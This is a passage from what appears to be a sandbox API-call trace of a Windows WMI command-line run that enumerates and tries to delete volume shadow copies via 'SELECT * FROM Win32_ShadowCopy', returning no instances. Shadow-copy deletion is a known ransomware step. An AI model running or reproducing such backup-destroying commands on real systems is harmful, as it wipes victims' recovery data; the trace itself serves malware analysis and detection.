_Dst=0x2e8900) returned 0x2e8900 [0149.671] free (_Block=0x239780) [0149.671] free (_Block=0x239760) [0149.671] free (_Block=0x239740) [0149.671] free (_Block=0x239720) [0149.671] free (_Block=0x239700) [0149.671] free (_Block=0x2396a0) [0149.672] IWbemServices:GetObject (in: This=0x2f6640, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x17f038*=0x0, ppCallResult=0x0 | out: ppObject=0x17f038*=0x2e8be0, ppCallResult=0x0) returned 0x0 [0149.675] malloc (_Size=0x18) returned 0x2396a0 [0149.675] IWbemClassObject:Get (in: This=0x2e8be0, wszName="Text", lFlags=0, pVal=0x17f070*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff772ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x17f070*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x309330*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x28e190, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0149.675] free (_Block=0x2396a0) [0149.676] SafeArrayGetLBound (in: psa=0x309330, nDim=0x1, plLbound=0x17f050 | out: plLbound=0x17f050) returned 0x0 [0149.676] SafeArrayGetUBound (in: psa=0x309330, nDim=0x1, plUbound=0x17f040 | out: plUbound=0x17f040) returned 0x0 [0149.676] SafeArrayGetElement (in: psa=0x309330, rgIndices=0x17f034, pv=0x17f088 | out: pv=0x17f088) returned 0x0 [0149.676] malloc (_Size=0x18) returned 0x2396a0 [0149.676] malloc (_Size=0x18) returned 0x239700 [0149.676] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0149.676] memcpy (in: _Dst=0x2e61e8, _Src=0x2e6198, _Size=0x30 | out: _Dst=0x2e61e8) returned 0x2e61e8 [0149.676] free (_Block=0x2396a0) [0149.676] IUnknown:Release (This=0x2e8be0) returned 0x0 [0149.676] free (_Block=0x2397a0) [0149.676] ??1CHString@@QEAA@XZ () returned 0x5ab63401 [0149.676] ??1CHString@@QEAA@XZ () returned 0x7fef77bc96c [0149.676] free (_Block=0x239680) [0149.676] ??1CHString@@QEAA@XZ () returned 0x7fef77bc96c [0149.677] lstrlenW (lpString="Shadow copy management.") returned 23 [0149.677] malloc (_Size=0x30) returned 0x238640 [0149.677] lstrlenW (lpString="Shadow copy management.") returned 23 [0149.677] free (_Block=0x239700) [0149.677] IUnknown:Release (This=0x2e8430) returned 0x0 [0149.677] free (_Block=0x2396c0) [0149.677] ??1CHString@@QEAA@XZ () returned 0x7fef77bc96c [0149.677] lstrlenW (lpString="PATH") returned 4 [0149.677] lstrlenW (lpString="delete") returned 6 [0149.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0149.677] lstrlenW (lpString="WHERE") returned 5 [0149.677] lstrlenW (lpString="delete") returned 6 [0149.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0149.677] lstrlenW (lpString="(") returned 1 [0149.677] lstrlenW (lpString="delete") returned 6 [0149.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0149.677] lstrlenW (lpString="/") returned 1 [0149.677] lstrlenW (lpString="delete") returned 6 [0149.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0149.677] lstrlenW (lpString="-") returned 1 [0149.678] lstrlenW (lpString="delete") returned 6 [0149.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0149.678] malloc (_Size=0x18) returned 0x2396c0 [0149.678] lstrlenW (lpString="GET") returned 3 [0149.678] lstrlenW (lpString="delete") returned 6 [0149.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0149.678] lstrlenW (lpString="LIST") returned 4 [0149.678] lstrlenW (lpString="delete") returned 6 [0149.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0149.678] lstrlenW (lpString="SET") returned 3 [0149.678] lstrlenW (lpString="delete") returned 6 [0149.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0149.678] lstrlenW (lpString="CREATE") returned 6 [0149.678] lstrlenW (lpString="delete") returned 6 [0149.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0149.678] lstrlenW (lpString="CALL") returned 4 [0149.678] lstrlenW (lpString="delete") returned 6 [0149.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0149.678] lstrlenW (lpString="ASSOC") returned 5 [0149.678] lstrlenW (lpString="delete") returned 6 [0149.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0149.678] lstrlenW (lpString="DELETE") returned 6 [0149.678] lstrlenW (lpString="delete") returned 6 [0149.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0149.679] free (_Block=0x2396c0) [0149.679] lstrlenW (lpString="/") returned 1 [0149.679] lstrlenW (lpString="delete") returned 6 [0149.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0149.679] lstrlenW (lpString="-") returned 1 [0149.679] lstrlenW (lpString="delete") returned 6 [0149.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0149.679] lstrlenW (lpString="delete") returned 6 [0149.679] malloc (_Size=0xe) returned 0x2396c0 [0149.679] lstrlenW (lpString="delete") returned 6 [0149.679] lstrlenW (lpString="GET") returned 3 [0149.679] lstrlenW (lpString="delete") returned 6 [0149.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0149.679] lstrlenW (lpString="LIST") returned 4 [0149.679] lstrlenW (lpString="delete") returned 6 [0149.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0149.679] lstrlenW (lpString="SET") returned 3 [0149.679] lstrlenW (lpString="delete") returned 6 [0149.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0149.679] lstrlenW (lpString="CREATE") returned 6 [0149.679] lstrlenW (lpString="delete") returned 6 [0149.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0149.679] lstrlenW (lpString="CALL") returned 4 [0149.679] lstrlenW (lpString="delete") returned 6 [0149.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0149.679] lstrlenW (lpString="ASSOC") returned 5 [0149.679] lstrlenW (lpString="delete") returned 6 [0149.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0149.680] lstrlenW (lpString="DELETE") returned 6 [0149.680] lstrlenW (lpString="delete") returned 6 [0149.680] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0149.680] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0149.680] malloc (_Size=0x3e) returned 0x23cb40 [0149.680] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0149.680] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff60 | out: _String="Select", _Context=0xffffffffffffff60) returned="Select" [0149.680] malloc (_Size=0x18) returned 0x239700 [0149.680] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0149.680] lstrlenW (lpString="FROM") returned 4 [0149.680] lstrlenW (lpString="*") returned 1 [0149.680] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0149.680] malloc (_Size=0x18) returned 0x239680 [0149.680] free (_Block=0x239700) [0149.680] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x2e007d007c0006 | out: _String=0x0, _Context=0x2e007d007c0006) returned="from" [0149.680] lstrlenW (lpString="FROM") returned 4 [0149.680] lstrlenW (lpString="from") returned 4 [0149.680] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0149.680] malloc (_Size=0x18) returned 0x239700 [0149.680] free (_Block=0x239680) [0149.680] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x2e007e007c0006 | out: _String=0x0, _Context=0x2e007e007c0006) returned="Win32_ShadowCopy" [0149.680] malloc (_Size=0x18) returned 0x239680 [0149.681] free (_Block=0x239700) [0149.681] free (_Block=0x23cb40) [0149.681] free (_Block=0x239680) [0149.681] lstrlenW (lpString="SET") returned 3 [0149.681] lstrlenW (lpString="delete") returned 6 [0149.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0149.681] lstrlenW (lpString="CREATE") returned 6 [0149.681] lstrlenW (lpString="delete") returned 6 [0149.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0149.681] free (_Block=0x2395c0) [0149.681] malloc (_Size=0x8) returned 0x23cb40 [0149.681] lstrlenW (lpString="GET") returned 3 [0149.681] lstrlenW (lpString="delete") returned 6 [0149.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0149.681] lstrlenW (lpString="LIST") returned 4 [0149.681] lstrlenW (lpString="delete") returned 6 [0149.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0149.681] lstrlenW (lpString="ASSOC") returned 5 [0149.681] lstrlenW (lpString="delete") returned 6 [0149.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0149.681] WbemLocator:IUnknown:AddRef (This=0x28cc10) returned 0x3 [0149.681] free (_Block=0x235b60) [0149.681] lstrlenW (lpString="") returned 0 [0149.681] lstrlenW (lpString="Q9IATRKPRH") returned 10 [0149.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="", cchCount2=0) returned 3 [0149.681] lstrlenW (lpString="Q9IATRKPRH") returned 10 [0149.681] malloc (_Size=0x16) returned 0x2395c0 [0149.681] lstrlenW (lpString="Q9IATRKPRH") returned 10 [0149.681] GetCurrentThreadId () returned 0xca8 [0149.682] GetCurrentProcess () returned 0xffffffffffffffff [0149.682] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x17f410 | out: TokenHandle=0x17f410*=0x260) returned 1 [0149.682] GetTokenInformation (in: TokenHandle=0x260, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x17f408 | out: TokenInformation=0x0, ReturnLength=0x17f408) returned 0 [0149.682] malloc (_Size=0x118) returned 0x23cb60 [0149.682] GetTokenInformation (in: TokenHandle=0x260, TokenInformationClass=0x3, TokenInformation=0x23cb60, TokenInformationLength=0x118, ReturnLength=0x17f408 | out: TokenInformation=0x23cb60, ReturnLength=0x17f408) returned 1 [0149.682] AdjustTokenPrivileges (in: TokenHandle=0x260, DisableAllPrivileges=0, NewState=0x23cb60*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1823881099, Attributes=0xc54b), (Luid.LowPart=0x0, Luid.HighPart=2317152, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=805307187, Attributes=0xc55c), (Luid.LowPart=0x0, Luid.HighPart=2294104, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0149.682] free (_Block=0x23cb60) [0149.682] CloseHandle (hObject=0x260) returned 1 [0149.682] lstrlenW (lpString="GET") returned 3 [0149.682] lstrlenW (lpString="delete") returned 6 [0149.682] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0149.682] lstrlenW (lpString="LIST") returned 4 [0149.682] lstrlenW (lpString="delete") returned 6 [0149.682] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0149.682] lstrlenW (lpString="SET") returned 3 [0149.682] lstrlenW (lpString="delete") returned 6 [0149.682] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0149.682] lstrlenW (lpString="CALL") returned 4 [0149.682] lstrlenW (lpString="delete") returned 6 [0149.682] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0149.682] lstrlenW (lpString="ASSOC") returned 5 [0149.682] lstrlenW (lpString="delete") returned 6 [0149.682] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0149.682] lstrlenW (lpString="CREATE") returned 6 [0149.682] lstrlenW (lpString="delete") returned 6 [0149.683] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0149.683] lstrlenW (lpString="DELETE") returned 6 [0149.683] lstrlenW (lpString="delete") returned 6 [0149.683] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0149.683] malloc (_Size=0x18) returned 0x239680 [0149.683] lstrlenA (lpString="") returned 0 [0149.683] malloc (_Size=0x2) returned 0x235b60 [0149.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff70314c, cbMultiByte=-1, lpWideCharStr=0x235b60, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0149.683] free (_Block=0x235b60) [0149.683] malloc (_Size=0x18) returned 0x239700 [0149.683] lstrlenA (lpString="") returned 0 [0149.683] malloc (_Size=0x2) returned 0x235b60 [0149.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff70314c, cbMultiByte=-1, lpWideCharStr=0x235b60, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0149.683] free (_Block=0x235b60) [0149.683] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0149.683] malloc (_Size=0x3e) returned 0x23cb60 [0149.683] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0149.683] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff40 | out: _String="Select", _Context=0xffffffffffffff40) returned="Select" [0149.683] malloc (_Size=0x18) returned 0x2397a0 [0149.683] free (_Block=0x239700) [0149.683] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x2e0082006c0005 | out: _String=0x0, _Context=0x2e0082006c0005) returned="*" [0149.683] lstrlenW (lpString="FROM") returned 4 [0149.684] lstrlenW (lpString="*") returned 1 [0149.684] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0149.684] malloc (_Size=0x18) returned 0x239700 [0149.684] free (_Block=0x2397a0) [0149.684] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x2e0083006c0005 | out: _String=0x0, _Context=0x2e0083006c0005) returned="from" [0149.684] lstrlenW (lpString="FROM") returned 4 [0149.684] lstrlenW (lpString="from") returned 4 [0149.684] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0149.684] malloc (_Size=0x18) returned 0x2397a0 [0149.684] free (_Block=0x239700) [0149.684] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x2e0084006c0005 | out: _String=0x0, _Context=0x2e0084006c0005) returned="Win32_ShadowCopy" [0149.684] malloc (_Size=0x18) returned 0x239700 [0149.684] free (_Block=0x2397a0) [0149.684] free (_Block=0x23cb60) [0149.684] malloc (_Size=0x18) returned 0x2397a0 [0149.684] malloc (_Size=0x18) returned 0x2396a0 [0149.684] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0149.684] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0149.684] memcpy (in: _Dst=0x30db48, _Src=0x276788, _Size=0x1e | out: _Dst=0x30db48) returned 0x30db48 [0149.685] memcpy (in: _Dst=0x30db64, _Src=0x2e6198, _Size=0x22 | out: _Dst=0x30db64) returned 0x30db64 [0149.685] free (_Block=0x239680) [0149.685] free (_Block=0x2397a0) [0149.685] ??0CHString@@QEAA@XZ () returned 0x17f380 [0149.685] GetCurrentThreadId () returned 0xca8 [0149.685] malloc (_Size=0x18) returned 0x2397a0 [0149.685] malloc (_Size=0x18) returned 0x239680 [0149.685] malloc (_Size=0x18) returned 0x239720 [0149.685] malloc (_Size=0x18) returned 0x239740 [0149.685] malloc (_Size=0x18) returned 0x239760 [0149.685] SysStringLen (param_1="\\\\") returned 0x2 [0149.685] SysStringLen (param_1="Q9IATRKPRH") returned 0xa [0149.685] memcpy (in: _Dst=0x276788, _Src=0x304ce8, _Size=0x6 | out: _Dst=0x276788) returned 0x276788 [0149.685] memcpy (in: _Dst=0x27678c, _Src=0x304d78, _Size=0x16 | out: _Dst=0x27678c) returned 0x27678c [0149.685] malloc (_Size=0x18) returned 0x239780 [0149.685] SysStringLen (param_1="\\\\Q9IATRKPRH") returned 0xc [0149.685] SysStringLen (param_1="\\") returned 0x1 [0149.686] memcpy (in: _Dst=0x2e61e8, _Src=0x276788, _Size=0x1a | out: _Dst=0x2e61e8) returned 0x2e61e8 [0149.686] memcpy (in: _Dst=0x2e6200, _Src=0x304cb8, _Size=0x4 | out: _Dst=0x2e6200) returned 0x2e6200 [0149.686] malloc (_Size=0x18) returned 0x23cb90 [0149.686] SysStringLen (param_1="\\\\Q9IATRKPRH\\") returned 0xd [0149.686] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0149.686] memcpy (in: _Dst=0x2e6238, _Src=0x2e61e8, _Size=0x1c | out: _Dst=0x2e6238) returned 0x2e6238 [0149.686] memcpy (in: _Dst=0x2e6252, _Src=0x304d18, _Size=0x16 | out: _Dst=0x2e6252) returned 0x2e6252 [0149.686] free (_Block=0x239780) [0149.686] free (_Block=0x239760) [0149.686] free (_Block=0x239740) [0149.686] free (_Block=0x239720) [0149.686] free (_Block=0x239680) [0149.686] free (_Block=0x2397a0) [0149.686] malloc (_Size=0x18) returned 0x2397a0 [0149.686] malloc (_Size=0x18) returned 0x239680 [0149.686] malloc (_Size=0x18) returned 0x239720 [0149.686] WbemLocator:IWbemLocator:ConnectServer (in: This=0x28cc10, strNetworkResource="\\\\Q9IATRKPRH\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff7729d0 | out: ppNamespace=0xff7729d0*=0x2f66d0) returned 0x0 [0149.693] free (_Block=0x239720) [0149.693] free (_Block=0x239680) [0149.693] free (_Block=0x2397a0) [0149.693] CoSetProxyBlanket (pProxy=0x2f66d0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0149.693] free (_Block=0x23cb90) [0149.693] ??1CHString@@QEAA@XZ () returned 0x7fef77bc96c [0149.693] ??0CHString@@QEAA@XZ () returned 0x17f2d0 [0149.693] GetCurrentThreadId () returned 0xca8 [0149.693] malloc (_Size=0x18) returned 0x2397a0 [0149.693] lstrlenA (lpString="") returned 0 [0149.693] malloc (_Size=0x2) returned 0x235b60 [0149.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff70314c, cbMultiByte=-1, lpWideCharStr=0x235b60, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0149.693] free (_Block=0x235b60) [0149.693] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0149.693] SysStringLen (param_1="") returned 0x0 [0149.693] free (_Block=0x2397a0) [0149.693] malloc (_Size=0x18) returned 0x2397a0 [0149.694] IWbemServices:ExecQuery (in: This=0x2f66d0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x17f2d8 | out: ppEnum=0x17f2d8*=0x2e9170) returned 0x0 [0149.898] free (_Block=0x2397a0) [0149.898] CoSetProxyBlanket (pProxy=0x2e9170, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0149.902] IEnumWbemClassObject:Next (in: This=0x2e9170, lTimeout=-1, uCount=0x1, apObjects=0x17f2e0, puReturned=0x17f2f0 | out: apObjects=0x17f2e0*=0x0, puReturned=0x17f2f0*=0x0) returned 0x1 [0149.903] IUnknown:Release (This=0x2e9170) returned 0x0 [0149.904] ??1CHString@@QEAA@XZ () returned 0x7fef77bc96c [0149.904] free (_Block=0x239700) [0149.904] free (_Block=0x2396a0) [0149.904] GetCurrentThreadId () returned 0xca8 [0149.904] ??0CHString@@QEAA@PEBG@Z () returned 0x17f4b8 [0149.904] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x17f4b8 [0149.904] malloc (_Size=0x800) returned 0x23d3e0 [0149.904] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x23d3e0, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0149.905] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0149.905] malloc (_Size=0x1c) returned 0x23d360 [0149.905] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x23d360, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0149.905] fprintf (in: _File=0x7feff192ab0, _Format="%s" | out: _File=0x7feff192ab0) returned 27 [0149.906] fflush (in: _File=0x7feff192ab0 | out: _File=0x7feff192ab0) returned 0 [0149.906] free (_Block=0x23d360) [0149.906] free (_Block=0x23d3e0) [0149.906] ??1CHString@@QEAA@XZ () returned 0x5ab63401 [0149.907] WbemLocator:IUnknown:Release (This=0x2f66d0) returned 0x0 [0149.907] ?Empty@CHString@@QEAAXXZ () returned 0x7fef77bc96c [0149.907] _kbhit () returned 0x0 [0149.908] free (_Block=0x23cb40) [0149.908] free (_Block=0x2395a0) [0149.908] free (_Block=0x239580) [0149.908] free (_Block=0x239560) [0149.909] free (_Block=0x239040) [0149.909] free (_Block=0x23ca40) [0149.909] free (_Block=0x239640) [0149.909] free (_Block=0x238640) [0149.909] free (_Block=0x2396c0) [0149.909] free (_Block=0x23caa0) [0149.909] free (_Block=0x239660) [0149.909] free (_Block=0x2396e0) [0149.909] free (_Block=0x23cb20) [0149.909] free (_Block=0x236c60) [0149.909] free (_Block=0x23caf0) [0149.909] ?Empty@CHString@@QEAAXXZ () returned 0x7fef77bc96c [0149.909] free (_Block=0x23ca70) [0149.909] free (_Block=0x2395e0) [0149.909] free (_Block=0x239600) [0149.909] free (_Block=0x237f80) [0149.909] free (_Block=0x2363e0) [0149.909] free (_Block=0x236430) [0149.909] free (_Block=0x2395c0) [0149.909] free (_Block=0x2364c0) [0149.909] free (_Block=0x236c40) [0149.909] free (_Block=0x238080) [0149.909] free (_Block=0x236c20) [0149.909] free (_Block=0x238040) [0149.909] free (_Block=0x236800) [0149.909] free (_Block=0x238000) [0149.909] free (_Block=0x2366e0) [0149.910] free (_Block=0x236700) [0149.910] free (_Block=0x236680) [0149.910] free (_Block=0x2366a0) [0149.910] free (_Block=0x236740) [0149.910] free (_Block=0x236760) [0149.910] free (_Block=0x2367a0) [0149.910] free (_Block=0x2367c0) [0149.910] free (_Block=0x2365c0) [0149.910] free (_Block=0x2365e0) [0149.910] free (_Block=0x236560) [0149.910] free (_Block=0x236580) [0149.910] free (_Block=0x236620) [0149.910] free (_Block=0x236640) [0149.910] free (_Block=0x236500) [0149.910] free (_Block=0x236520) [0149.910] free (_Block=0x236480) [0149.910] free (_Block=0x36dfa0) [0149.910] free (_Block=0x236cb0) [0149.910] WbemLocator:IUnknown:Release (This=0x28cc10) returned 0x2 [0149.910] WbemLocator:IUnknown:Release (This=0x2f6640) returned 0x0 [0149.911] WbemLocator:IUnknown:Release (This=0x2f6520) returned 0x0 [0149.911] WbemLocator:IUnknown:Release (This=0x28cc10) returned 0x1 [0149.911] ?Empty@CHString@@QEAAXXZ () returned 0x7fef77bc96c [0149.911] WbemLocator:IUnknown:Release (This=0x28cc10) returned 0x0 [0149.911] free (_Block=0x2394e0) [0149.911] free (_Block=0x239500) [0149.911] free (_Block=0x238580) [0149.911] free (_Block=0x239520) [0149.912] free (_Block=0x239540) [0149.912] free (_Block=0x2385c0) [0149.912] free (_Block=0x239360) [0149.912] free (_Block=0x239380) [0149.912] free (_Block=0x238400) [0149.912] free (_Block=0x2393a0) [0149.912] free (_Block=0x2393c0) [0149.912] free (_Block=0x238440) [0149.912] free (_Block=0x2392e0) [0149.912] free (_Block=0x239300) [0149.912] free (_Block=0x238380) [0149.912] free (_Block=0x239320) [0149.912] free (_Block=0x239340) [0149.912] free (_Block=0x2383c0) [0149.912] free (_Block=0x239460) [0149.912] free (_Block=0x239480) [0149.912] free (_Block=0x238500) [0149.912] free (_Block=0x2394a0) [0149.912] free (_Block=0x2394c0) [0149.912] free (_Block=0x238540) [0149.912] free (_Block=0x239260) [0149.913] free (_Block=0x239280) [0149.913] free (_Block=0x238300) [0149.913] free (_Block=0x2392a0) [0149.913] free (_Block=0x2392c0) [0149.913] free (_Block=0x238340) [0149.913] free (_Block=0x2393e0) [0149.913] free (_Block=0x239400) [0149.913] free (_Block=0x238480) [0149.913] free (_Block=0x239420) [0149.913] free (_Block=0x239440) [0149.913] free (_Block=0x2384c0) [0149.913] free (_Block=0x2391a0) [0149.913] free (_Block=0x2391c0) [0149.913] free (_Block=0x238240) [0149.913] free (_Block=0x239060) [0149.913] free (_Block=0x239080) [0149.913] free (_Block=0x238100) [0149.913] free (_Block=0x239020) [0149.913] free (_Block=0x239000) [0149.913] free (_Block=0x2380c0) [0149.914] free (_Block=0x2390e0) [0149.914] free (_Block=0x239100) [0149.914] free (_Block=0x238180) [0149.914] free (_Block=0x2391e0) [0149.914] free (_Block=0x239200) [0149.914] free (_Block=0x238280) [0149.914] free 